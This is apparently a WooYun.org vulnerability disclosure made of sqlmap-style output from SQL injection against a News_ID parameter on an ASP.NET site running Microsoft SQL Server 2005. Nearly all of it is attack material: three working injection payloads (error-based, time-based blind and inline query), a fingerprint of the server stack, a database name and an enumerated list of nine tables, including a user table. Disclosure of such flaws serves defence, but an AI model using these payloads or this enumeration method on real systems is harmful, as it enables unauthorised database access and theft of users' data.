WooYun.org

---
Parameter: News_ID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: News_ID=129 AND 2285=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2285=2285) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)))
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: News_ID=129 AND 4840=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: News_ID=(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8064=8064) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: a1103152350
[9 tables]
+-------------+
| N_Class     |
| N_Firends   |
| N_HotKey    |
| N_News      |
| N_OutServer |
| N_User      |
| N_WebSite   |
| N_YuYue     |
| N_leaveword |
+-------------+